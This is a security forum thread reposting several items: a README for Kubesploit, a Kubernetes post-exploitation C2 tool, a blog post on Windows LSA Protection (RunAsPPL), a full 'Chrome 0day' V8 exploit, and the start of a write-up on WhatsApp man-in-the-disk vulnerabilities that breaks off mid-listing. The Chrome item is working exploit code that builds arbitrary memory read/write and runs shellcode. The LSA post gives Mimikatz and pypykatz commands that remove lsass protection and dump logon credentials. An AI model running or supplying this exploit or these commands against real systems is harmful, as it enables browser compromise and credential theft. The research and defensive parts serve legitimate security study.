  14. Kubesploit Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent dedicated for containerized environments written in Golang and built on top of Merlin project by Russel Van Tuyl (@Ne0nd0g). Our Motivation While researching Docker and Kubernetes, we noticed that most of the tools available today are aimed at passive scanning for vulnerabilities in the cluster, and there is a lack of more complex attack vector coverage. They might allow you to see the problem but not exploit it. It is important to run the exploit to simulate a real-world attack that will be used to determine corporate resilience across the network. When running an exploit, it will practice the organization's cyber event management, which doesn't happen when scanning for cluster issues. It can help the organization learn how to operate when real attacks happen, see if its other detection system works as expected and what changes should be made. We wanted to create an offensive tool that will meet these requirements. But we had another reason to create such a tool. We already had two open-source tools (KubiScan and kubeletctl) related to Kubernetes, and we had an idea for more. Instead of creating a project for each one, we thought it could be better to make a new tool that will centralize the new tools, and this is when Kubesploit was created. We searched for an open-source that provide that heavy lifting for a cross-platform system, and we found Merlin, written by Russel Van Tuyl (@Ne0nd0g), to be suitable for us. Our main goal is to contribute to raising awareness about the security of containerized environments, and improve the mitigations implemented in the various networks. All of this captured through a framework that provides the appropriate tools for the job of PT teams and Red Teamers during their activities in these environments. Using these tools will help you estimate these environments' strengths and make the required changes to protect them. What's New As the C&C and the agent infrastructure were done already by Merlin, we integrated Go interpreter ("Yaegi") to be able to run Golang code from the server to the agent. It allowed us to write our modules in Golang, provide more flexibility on the modules, and dynamically load new modules. It is an ongoing project, and we are planning to add more modules related to Docker and Kubernetes in the future. The currently available modules are: Container breakout using mounting Container breakout using docker.sock Container breakout using CVE-2019-5736 exploit Scan for Kubernetes cluster known CVEs Port scanning with focus on Kubernetes services Kubernetes service scan from within the container Light kubeletctl containing the following options: Scan for containers with RCE Scan for Pods and containers Scan for tokens from all available containers Run command with multiple options Quick Start We created a dedicated Kubernetes environment in Katacoda for you to experiment with Kubesploit. It’s a full simulation with a complete set of automated instructions on how to use Kubesploit. We encourage you to explore it. Build To build this project, run the make command from the root folder. Quick Build To run quick build for Linux, you can run the following: export PATH=$PATH:/usr/local/go/bin go build -o agent cmd/merlinagent/main.go go build -o server cmd/merlinserver/main.go Mitigations YARA rules We created YARA rules that will help to catch Kubesploit binaries. The rules are written in the file kubesploit.yara. Agent Recording Every Go module loaded to the agent is being recorded inside the victim machine. MITRE map We created a MITRE map of the vectors attack being used by Kubesploit. Mitigation for Modules For every module we created, we wrote its description and how to defend from it. We sum it up in the MITIGATION.md file. Contributing We welcome contributions of all kinds to this repository. For instructions on how to get started and descriptions of our development workflows, please see our contributing guide. Credit We want to thank Russel Van Tuyl (@Ne0nd0g) for creating Merlin as an open-source that allowed us to build Kubesploit on top of it. We also want to thank Traefik Labs (@traefik) for creating Go interpreter ("Yaegi") that allowed us to run the Golang modules on a remote agent easily. License Copyright (c) 2021 CyberArk Software Ltd. All rights reserved. This repository is licensed under GPL-3.0 License. For the full license text see LICENSE. Share Your Thoughts And Feedback For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) from CyberArk Labs or open an issue. You can find more projects developed by us at https://github.com/cyberark/. Sursa: https://github.com/cyberark/kubesploit
      • 1
      • Upvote
  15. in. We will be tracing the execution flow of fopen C function through User-Mode to the ntdll.dll-NtCreateFile where it ends in the part of User-Mode. Sample fopen.exe to download available here: https://github.com/Dump-GUY/Malware-a...
  16. Do You Really Know About LSA Protection (RunAsPPL)? April 07, 2021 When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days. Introduction When you think about it, RunAsPPL for LSASS is a true quick win. It is very easy to configure as the only thing you have to do is add a simple value in the registry and reboot. Like any other protection though, it is not bulletproof and it is not sufficient on its own, but it is still particularly efficient. Attackers will have to use some relatively advanced tricks if they want to work around it, which ultimately increases their chance of being detected. Therefore, as a security consultant, this is one of the top recommendations I usually give to a client. However, from a client’s perspective, I noticed that this protection tends to be confused with Credential Guard, which is completely different. I think that this confusion comes from the fact that the latter seems to provide a more robust mechanism although Credential Guard and LSA Protection are actually complementary. But of course, as a consultant, you have to explain these concepts if you want to convince a client that they should implement both recommendations. Some time ago, I had to give such explanation so, without going into too much detail, I think I said something like this about LSA Protection: “only a digitally signed binary can access a protected process”. You probably noticed that this sentence does not make much sense. This is how I realized that I didn’t really know how Protected Processes worked. So, I did some research and I found some really interesting things along the way, hence why I wanted to write about it. Disclaimer – Most of the concepts I discuss in this post are already covered by the official documentation and the book Windows Internals 7th edition (Part 1), which were my two main sources of information. The objective of this blog post is not to paraphrase them but rather gather the information which I think is the most valuable from a security consultant’s perspective. How to Enable LSA Protection (RunAsPPL) As mentioned previously, RunAsPPL is very easy to enable. The procedure is detailed in the official documentation and has also been covered in many blog posts before. If you want to enable it within a corporate environment, you should follow the procedure provided by Microsoft and create a Group Policy: Configuring Additional LSA Protection. But if you just want to enable it manually on a single machine, you just have to: open the Registry Editor (regedit.exe) as an Administrator; open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa; add the DWORD value RunAsPPL and set it to 1; reboot. That’s it! You are done! Before applying this setting throughout an entire corporate environment, there are two particular cases to consider though. They are both described in the official documentation. If the answer to at least one of the two following questions is “yes” then you need to take some precautions. Do you use any third-party authentication module? Do you use UEFI and/or Secure Boot? Third-party authentication module – If a third-party authentication module is required, such as in the case of a Smart Card Reader for example, you should make sure that they meet the requirements that are listed here: Protected process requirements for plug-ins or drivers. Basically, the module must be digitally signed with a Microsoft signature and it must comply with the Microsoft Security Development Lifecycle (SDL). The documentation also contains some instructions on how to set up an Audit Policy prior to the rollout phase to determine whether such module would be blocked if RunAsPPL were enabled. Secure Boot – If Secure Boot is enabled, which is usually the case with modern laptops for example, there is one important thing to be aware of. When RunAsPPL is enabled, the setting is stored in the firmware, in a UEFI variable. This means that, once the registry key is set and the machine has rebooted, deleting the newly added registry value will have no effect and RunAsPPL will remain enabled. If you want to disable the protection, you have to follow the procedure provided by Microsoft here: To disable LSA protection. You Shall Not Pass! By now, I assume you all know that RunAsPPL is an effective protection against tools such as Mimikatz (more about that in the next parts) or ProcDump from the Windows Sysinternals tools suite for example. An output such as the one below should therefore look familiar. This screenshot shows several important things: the current user is a member of the default Administrators group; the current user has SeDebugPrivilege (although it is currently disabled); the command privilege::debug in Mimikatz successfully enabled SeDebugPrivilege; the command sekurlsa::logonpasswords failed with the error code 0x00000005. So, despite all the privileges the current user has, the command failed. To understand why, we should take a look at the kuhl_m_sekurlsa_acquireLSA() function in mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c. Here is a simplified version of the code that shows only the part we are interested in. HANDLE hData = NULL; DWORD pid; DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION; kull_m_process_getProcessIdForName(L"lsass.exe", &pid); hData = OpenProcess(processRights, FALSE, pid); if (hData && hData != INVALID_HANDLE_VALUE) { // if OpenProcess OK } else { PRINT_ERROR_AUTO(L"Handle on memory"); } In this code snippet, PRINT_ERROR_AUTO is a macro that basically prints the name of the function which failed along with the error code. The error code itself is retrieved by invoking GetLastError(). For those of you who are not familiar with the way the Windows API works, you just have to know that SetLastError() and GetLastError() are two Win32 functions that allow you to set and get the last standard error code. The first 500 codes are listed here: System Error Codes (0-499). Apart from that, the rest of the code is pretty straightforward. It first gets the PID of the process called lsass.exe and then, it tries to open it (i.e. get a process handle) with the flags PROCESS_VM_READ and PROCESS_QUERY_INFORMATION by invoking the Win32 function OpenProcess. What we can see on the previous screenshot is that this function failed with the error code 0x00000005, which simply means “Access is denied”. This confirms that, once RunAsPPL is enabled, even an administrator with SeDebugPrivilege cannot open LSASS with the required access flags. All the things I have explained so far can be considered common knowledge as they have been discussed in many other blog posts or pentest cheat sheets before. But I had to do this recap to make sure we are all on the same page and also to introduce the following parts. Bypassing RunAsPPL with Currently Known Techniques At the time of writing this blog post, there are three main known techniques for bypassing RunAsPPL and accessing the memory of lsass.exe (or any other PPL in general). Once again, this has already been discussed in other blog posts, so I will try to keep this short. Technique 1 – The Revenge of the Kiwi In the previous part, I stated that RunAsPPL effectively prevented Mimikatz from accessing the memory of lsass.exe, but this tool is actually also the most commonly known technique for bypassing it. To do so, Mimikatz uses a digitally signed driver to remove the protection flag of the Process object in the Kernel. The file mimidrv.sys must be located in the current folder in order to be loaded as a Kernel driver service using the command !+. Then, you can use the command !processprotect to remove the protection and finally access lsass.exe. mimikatz # !+ mimikatz # !processprotect /process:lsass.exe /remove mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords Once you are done, you can even “restore” the protection using the same command, but without the /remove argument and finally unload the driver with !-. mimikatz # !processprotect /process:lsass.exe mimikatz # !- There is one thing to be aware of if you do that though! You have to know that Mimikatz does not restore the protection level to its original level. The two screenshots below show the protection level of the lsass.exe process before and after issuing the command !processprotect /process:lsass.exe. As you can see, when RunAsPPL is enabled, the protection level is PsProtectedSignerLsa-Light whereas it is PsProtectedSignerWinTcb after the protection was restored by Mimikatz. In a way, this renders the system even more secure than it was as you will see in the next part but it could also have some undesired side effects. Technique 2 – Bring You Own Driver The major drawback of the previous method is that it can be easily detected by an antivirus. Even if you are able to execute Mimikatz in-memory for example, you still have to copy mimidrv.sys onto the target. At this point, you could consider compiling a custom version of the driver to evade signature-based detection, but this will also break the digital signature of the file. So, unless you are willing to pay a few hundred dollars to get your new driver signed, this will not do. If you don’t want to go through the official signing process, there is a clever trick you can use. This trick consists in loading an official and vulnerable driver that can be exploited to run arbitrary code in the Kernel. Once the driver is loaded it can be exploited from User-land to load an unsigned driver for example. This technique is implemented in gdrv-loader and PPLKiller for instance. Technique 3 – Python & Katz The last two techniques both rely on the use of a driver to execute arbitrary code in the Kernel and disable the Process protection. Such technique is still very dangerous, make one mistake and you trigger a BSOD. More recently though, SkelSec presented an alternative method for accessing lsass.exe. In an article entitled Duping AV with handles, he presented a way to bypass AV detection/blocking access to LSASS process. If you want to access LSASS’ memory, the first thing you have to do is invoke OpenProcess to get a handle with the appropriate rights on the Process object. Therefore, some AV software may block such attempt, thus effectively killing the attack in its early stage. The idea behind the technique described by SkelSec is simple: simply do not invoke OpenProcess. But how do you get the initial handle then? The answer came from the following observation. Sometimes, other processes, such as in the case of Antivirus software, already have an opened handle on the LSASS process in their memory space. So, as an administrator with debug privileges, you could copy this handle into you own process and then use it to access LSASS. It turns out this technique serves another purpose. It can also be used to bypass RunAsPPL because some unprotected processes may have obtained a handle on the LSASS process by another mean, using a driver for instance. In which case you can use pypykatz with the following command. pypykatz live lsa --method handledup On some occasions, this method worked perfectly fine for me but it is still a bit random. The chance of success highly depends on the target environment, which explains why I was not able to reproduce it on my lab machine. What are PPL Processes? Here comes the interesting part. In the previous paragraphs, I intentionally glossed over some key concepts. I chose to present all the things that are commonly known first so I can explain them into more detail here. A Long Time Ago in a Galaxy Far, Far Away… OK, it was not that long ago and it was not that far away either. But still, the history behind PPLs is quite interesting and definitely worth mentioning. First things first, PPL means Protected Process Light but, before that, there were just Protected Processes. The concept of Protected Process was introduced with Windows Vista / Server 2008 and its objective was not to protect your data or your credentials. Its initial objective was to protect media content and comply with DRM (Digital Rights Management) requirements. Microsoft developed this mechanism so that your media player could read a Blu-ray for instance, while preventing you from copying its content. At the time, the requirement was that the image file (i.e. the executable file) had to be digitally signed with a special Windows Media Certificate (as explained in the “Protected Processes” part of Windows Internals). In practice, a Protected Process can be accessed by an unprotected process only with very limited privileges: PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_TERMINATE and PROCESS_SUSPEND_RESUME. This set can even be reduced for some highly-sensitive processes. A few years later, starting with Windows 8.1 / Server 2012 R2, Microsoft introduced the concept of Protected Process Light. PPL is actually an extension of the previous Protected Process model and adds the concept of “Protection level”, which basically means that some PP(L) processes can be more protected than others. Protection Levels The protection level of a process was added to the EPROCESS kernel structure and is more specifically stored in its Protection member. This Protection member is a PS_PROTECTION structure and is documented here. typedef struct _PS_PROTECTION { union { UCHAR Level; struct { UCHAR Type : 3; UCHAR Audit : 1; // Reserved UCHAR Signer : 4; }; }; } PS_PROTECTION, *PPS_PROTECTION; Although it is represented as a structure, all the information is stored in the two nibbles of a single byte (Level is a UCHAR, i.e. an unsigned char). The first 3 bits represent the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is a PP or a PPL. The last 4 bits represent the Signer type (see PS_PROTECTED_SIGNER below), i.e. the actual level of protection. typedef enum _PS_PROTECTED_TYPE { PsProtectedTypeNone = 0, PsProtectedTypeProtectedLight = 1, PsProtectedTypeProtected = 2 } PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE; typedef enum _PS_PROTECTED_SIGNER { PsProtectedSignerNone = 0, // 0 PsProtectedSignerAuthenticode, // 1 PsProtectedSignerCodeGen, // 2 PsProtectedSignerAntimalware, // 3 PsProtectedSignerLsa, // 4 PsProtectedSignerWindows, // 5 PsProtectedSignerWinTcb, // 6 PsProtectedSignerWinSystem, // 7 PsProtectedSignerApp, // 8 PsProtectedSignerMax // 9 } PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER; As you probably guessed, a process’ protection level is defined by a combination of these two values. The below table lists the most common combinations. Protection level Value Signer Type PS_PROTECTED_SYSTEM 0x72 WinSystem (7) Protected (2) PS_PROTECTED_WINTCB 0x62 WinTcb (6) Protected (2) PS_PROTECTED_WINDOWS 0x52 Windows (5) Protected (2) PS_PROTECTED_AUTHENTICODE 0x12 Authenticode (1) Protected (2) PS_PROTECTED_WINTCB_LIGHT 0x61 WinTcb (6) Protected Light (1) PS_PROTECTED_WINDOWS_LIGHT 0x51 Windows (5) Protected Light (1) PS_PROTECTED_LSA_LIGHT 0x41 Lsa (4) Protected Light (1) PS_PROTECTED_ANTIMALWARE_LIGHT 0x31 Antimalware (3) Protected Light (1) PS_PROTECTED_AUTHENTICODE_LIGHT 0x11 Authenticode (1) Protected Light (1) Signer Types In the early days of Protected Processes, the protection level was binary, either a process was protected or it was not. We saw that this changed when PPL were introduced with Windows NT 6.3. Both PP and PPL now have a protection level which is determined by a signer level as described previously. Therefore, another interesting thing to know is how the signer type and the protection level are determined. The answer to this question is quite simple. Although there are some exceptions, the signer level is most commonly determined by a special field in the file’s digital certificate: Enhanced Key Usage (EKU). On this screenshot, you can see two examples, wininit.exe on the left and SgrmBroker.exe on the right. In both cases, we can see that the EKU field contains the OID that represents the Windows TCB Component signer type. The second highlighted OID represents the protection level, which is Protected Process Light in the case of wininit.exe and Protected Process in the case of SgrmBroker.exe. As a result, we know that the latter can be executed as a PP whereas the former can only be executed as a PPL. However, they will both have the WinTcb level. Protection Precedence The last key aspect that needs to be discussed is the Protection Precedence. In the “Protected Process Light (PPL) part of Windows Internals 7th Edition Part 1, you can read the following: When interpreting the power of a process, keep in mind that first, protected processes always trump PPLs, and that next, higher-value signer processes have access to lower ones, but not vice versa. In other words: a PP can open a PP or a PPL with full access, as long as its signer level is greater or equal; a PPL can open another PPL with full access, as long as its signer level is greater or equal; a PPL cannot open a PP with full access, regardless of its signer level. Note: it goes without saying that the ACL checks still apply. Being a Protected Process does not grant you super powers. If you are running a protected process as a low privileged user, you will not be able to magically access other users’ processes. It’s an additional protection. To illustrate this, I picked 3 easily identifiable processes / image files: wininit.exe – Session 0 initilization lsass.exe – LSASS process MsMpEng.exe – Windows Defender service Pr. Process Type Signer Level 1 wininit.exe Protected Light WinTcb PsProtectedSignerWinTcb-Light 2 lsass.exe Protected Light Lsa PsProtectedSignerLsa-Light 3 MsMpEng.exe Protected Light Antimalware PsProtectedSignerAntimalware-Light These 3 PPLs are running as NT AUTHORITY\SYSTEM with SeDebugPrivilege so user rights are not a concern in this example. This all comes down to the protection level. As wininit.exe has the signer type WinTcb, which is the highest possible value for a PPL, it could access the two other processes. Then, lsass.exe could access MsMpEng.exe as the signer level Lsa is higher than Antimalware. Finally, MsMpEng.exe can access none of the two other processes because it has the lowest level. Conclusion In the end, the concept of Protected Process (Light) remains a Userland protection. It was designed to prevent normal applications, even with administrator privileges, from accessing protected processes. This explains why most common techniques for bypassing such protection require the use of a driver. If you are able to execute arbitrary code in the Kernel, you can do (almost) whatever you want and you could well completely disable the protection of any Protected Process. Of course, this has become a bit more complicated over the years as you are now required to load a digitally signed driver, but this restriction can be worked around as we saw. In this post, we also saw that this concept has evolved from a basic unprotected/protected model to a hierarchical model, in which some processes can be more protected than others. In particular, we saw that “LSASS” has its own protection level – PsProtectedSignerLsa-Light. This means that a process with a higher protection level (e.g.: “WININIT”), would still be able to open it with full access. There is one aspect of PP/PPL that I did not mention though. The “L” in “PPL” is here for a reason. Indeed, with the concept of Protected Process Light, the overall security model was partially loosened, which opens some doors for Userland exploits. In the coming days, I will release the second part of this post to discuss one of these techniques. This will also be accompanied by the release of a new tool – PPLdump. As its name implies, this tool provides the ability for a local administrator to dump the memory of any PPL process, using only Userland tricks. Lastly, I would like to mention that this Research & Development work was partly done in the context of my job at SCRT. So, the next part will be published on their blog, but I’ll keep you posted on Twitter. The best is yet to come, so stay tuned! Links & Resources Microsoft - How to configure additional LSA protection of credentials https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection Windows Internals 7th edition (Part 1) https://docs.microsoft.com/en-us/sysinternals/resources/windows-internals Sursa: https://itm4n.github.io/lsass-runasppl/
  17. Nytro

    Chrome 0day

    /* BSD 2-Clause License Copyright (c) 2021, rajvardhan agarwal All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); let buf2 = new ArrayBuffer(0x150); function ftoi(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); } function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); return f64_buf[0]; } const _arr = new Uint32Array([2**31]); function foo(a) { var x = 1; x = (_arr[0] ^ 0) + 1; x = Math.abs(x); x -= 2147483647; x = Math.max(x, 0); x -= 1; if(x==-1) x = 0; var arr = new Array(x); arr.shift(); var cor = [1.1, 1.2, 1.3]; return [arr, cor]; } for(var i=0;i<0x3000;++i) foo(true); var x = foo(false); var arr = x[0]; var cor = x[1]; const idx = 6; arr[idx+10] = 0x4242; function addrof(k) { arr[idx+1] = k; return ftoi(cor[0]) & 0xffffffffn; } function fakeobj(k) { cor[0] = itof(k); return arr[idx+1]; } var float_array_map = ftoi(cor[3]); var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; var fake = fakeobj(addrof(arr2) + 0x20n); function arbread(addr) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); return (fake[0]); } function arbwrite(addr, val) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); fake[0] = itof(BigInt(val)); } function copy_shellcode(addr, shellcode) { let dataview = new DataView(buf2); let buf_addr = addrof(buf2); let backing_store_addr = buf_addr + 0x14n; arbwrite(backing_store_addr, addr); for (let i = 0; i < shellcode.length; i++) { dataview.setUint32(4*i, shellcode[i], true); } } var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)); var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; copy_shellcode(rwx_page_addr, shellcode); f(); Sursa: https://github.com/r4j0x00/exploits/tree/master/chrome-0day
  18. Remote exploitation of a man-in-the-disk vulnerability in WhatsApp (CVE-2021-24027) CENSUS has been investigating for some time now the exploitation potential of Man-in-the-Disk (MitD) [01] vulnerabilities in Android. Recently, CENSUS identified two such vulnerabilities in the popular WhatsApp messenger app for Android [34]. The first of these was possibly independently reported to Facebook and was found to be patched in recent versions, while the second one was communicated by CENSUS to Facebook and was tracked as CVE-2021-24027 [33]. As both vulnerabilities have now been patched, we would like to share our discoveries regarding the exploitation potential of such vulnerabilities with the rest of the community. In this article we will have a look at how a simple phishing attack through an Android messaging application could result in the direct leakage of data found in External Storage (/sdcard). Then we will show how the two aforementioned WhatsApp vulnerabilities would have made it possible for attackers to remotely collect TLS cryptographic material for TLS 1.3 and TLS 1.2 sessions. With the TLS secrets at hand, we will demonstrate how a man-in-the-middle (MitM) attack can lead to the compromise of WhatsApp communications, to remote code execution on the victim device and to the extraction of Noise [05] protocol keys used for end-to-end encryption in user communications. Android 10 introduced the scoped storage feature [13], as a proactive defense against these types of attacks. With scoped storage, apps get by default access only to their own content on External Storage. Apps bearing a certain permission [36] can also access content shared by other applications. Finally, full access to External Storage is only granted to special purpose apps (e.g. file managers) that have been audited by Google. Android 11 is the first version to fully enforce the scoped storage rules on all apps, while Android 10 included a permissive mode of operation to provide developers with the needed time to transition to the new file access scheme. The techniques presented in this article apply to mobile devices running Android versions up to and including Android 9. It is possible to perform similar attacks using file-based access in Android 10, but we have not included these for reasons of brevity. Even without Android 10 in the picture, the number of affected devices remains quite large. Appbrain statistics [35] hint that devices running Android up to and including version 9 may very well constitute a 60% of all devices running Android today. In the past, state sponsored actors have used messaging applications to infiltrate activist groups [06] or even to attack individuals [07] and so seemingly innocent interactions in such applications may indeed be part of targeted phishing attacks. More importantly, vulnerabilities that enable adversaries to perform man-in-the-middle attacks can be abused for mass surveillance purposes. CENSUS has no knowledge on whether the attacks described in this article have indeed been used in the wild. WhatsApp users are strongly recommended to upgrade to version 2.21.4.18 or better. Keeping system components updated, such as the Chrome browser and the Android Operating System, is also key to the establishment of a proactive defense against man-in-the-disk vulnerabilities. Note: All WhatsApp code snippets presented in this text correspond to decompiled Java code recovered from an older version of WhatsApp (2.19.355) using jadx [08]. Most classes and variables have been renamed to reflect their semantics. Original minified class names are also provided where possible. Here are some quick links to help you navigate through this blog post: The Android Media Store Content Provider The Chrome CVE-2020-6516 Same-Origin-Policy bypass Session Resumption and Pre-Shared Keys in TLS 1.3 Session Resumption and the Master Secret in TLS 1.2 The WhatsApp TLS Man-in-the-disk Vulnerabilities From TLS secrets collection to Remote Code Execution Stealing the victim's Noise protocol key pair Conclusion and Future Work The Android Media Store Content Provider When a user clicks on a picture message, WhatsApp needs to call an external application to view the file. However, the external application might not have access to WhatsApp's internal storage. Indeed, one cannot make any assumptions on the whereabouts of this picture file on the filesystem or its permissions. So, in the picture case, there must be a way for the photo viewer to locate, read and display media files belonging to WhatsApp. Enter the concept of Content Providers [09], an IPC mechanism by which one application (e.g. WhatsApp) can share resources with any other application (e.g. Google Photos). Content providers are an interesting technology and a powerful tool in the hands of Android developers. There are plenty of content providers on an Android system; some exported by third-party applications, others exported by the Android framework itself. For example, a modern Android device comes with content providers that expose SMS and MMS information, telephony logs, browser bookmarks, downloaded files and so on. Of course, content providers also come with a means of controlling access to their resources (e.g. see exported, permission and grantUriPermissions [10]). Despite the various pitfalls and past CVE-less issues [11], these security controls generally work well. However, there are certain content providers which can be freely accessed by any application by design. The Media Store is one such example. It exports a content provider which indexes and manages all files under /sdcard. Using the Media Store, applications can read and write files in external storage, without relying on absolute filesystem paths. The Android developer documentation emphasizes that the content provider of Media Store is the preferred way of accessing external storage files in application code. To experiment with content providers, one can use the content command on Android devices. Root access is not necessarily required. For example, to see the list of files managed by the Media Store, one can execute the following command: $ content query --uri content://media/external/file To make the output more human friendly, one can limit the displayed columns to the identifier and path of each indexed file. $ content query --uri content://media/external/file --projection _id,_data Media providers exist in their own private namespace. As illustrated in the example above, to access a content provider the corresponding content:// URI should be specified. Generally, information on the paths, via which a provider can be accessed, can be recovered by looking at application manifests (in case the content provider is exported by an application) or the source code of the Android framework. Interestingly, on Android devices Chrome supports accessing content providers via the content:// scheme. This feature allows the browser to access resources (e.g. photos, documents etc.) exported by third party applications. To verify this, one can insert a custom entry in the Media Store and then access it using the browser: $ cd /sdcard $ echo "Hello, world!" > test.txt $ content insert --uri content://media/external/file \ --bind _data:s:/storage/emulated/0/test.txt \ --bind mime_type:s:text/plain To discover the identifier of the newly inserted file: $ content query --uri content://media/external/file \ --projection _id,_data | grep test.txt Row: 283 _id=747, _data=/storage/emulated/0/test.txt And to actually view the file in Chrome, one can use a URL like the one shown in the following picture. Notice the file identifier 747 (discovered above) which is used as a suffix in the URL. As this article focuses on WhatsApp, it would be interesting to see the list of related files indexed by the Media Store. The following output was collected from a Pixel 3a device after using WhatsApp for a few days. $ content query --uri content://media/external/file --projection _id,_data | grep -i whatsapp ... Row: 82 _id=58, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache Row: 83 _id=705, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/157.240.9.53.443 Row: 84 _id=239, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/crashlogs.whatsapp.net.443 Row: 85 _id=240, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/pps.whatsapp.net.443 Row: 86 _id=90, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/static.whatsapp.net.443 Row: 87 _id=706, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/v.whatsapp.net.443 Row: 88 _id=89, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/www.whatsapp.com.443 ... Row: 90 _id=57, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions Row: 91 _id=704, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bW1nLndoYXRzYXBwLm5ldCM0NDMjVExTX0FFU18xMjhfR0NNX1NIQTI1Ng== Row: 92 _id=743, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bWVkaWEtYW10Mi0xLmNkbi53aGF0c2FwcC5uZXQjNDQzI1RMU19BRVNfMTI4X0dDTV9TSEEyNTY= Row: 93 _id=744, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bWVkaWEuZmF0aDQtMi5mbmEud2hhdHNhcHAubmV0IzQ0MyNUTFNfQUVTXzEyOF9HQ01fU0hBMjU2 ... Row: 291 _id=206, _data=/storage/emulated/0/WhatsApp/Backups Row: 292 _id=252, _data=/storage/emulated/0/WhatsApp/Backups/chatsettingsbackup.db.crypt1 Row: 293 _id=253, _data=/storage/emulated/0/WhatsApp/Backups/statusranking.db.crypt1 Row: 294 _id=251, _data=/storage/emulated/0/WhatsApp/Backups/stickers.db.crypt1 Row: 295 _id=204, _data=/storage/emulated/0/WhatsApp/Databases Row: 296 _id=708, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-07.1.db.crypt12 Row: 297 _id=709, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-08.1.db.crypt12 Row: 298 _id=746, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-09.1.db.crypt12 Row: 299 _id=243, _data=/storage/emulated/0/WhatsApp/Databases/msgstore.db.crypt12 ... Row: 319 _id=528, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images Row: 320 _id=721, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0013.jpeg Row: 321 _id=722, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0015.jpeg Row: 322 _id=724, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0018.jpeg Row: 323 _id=733, 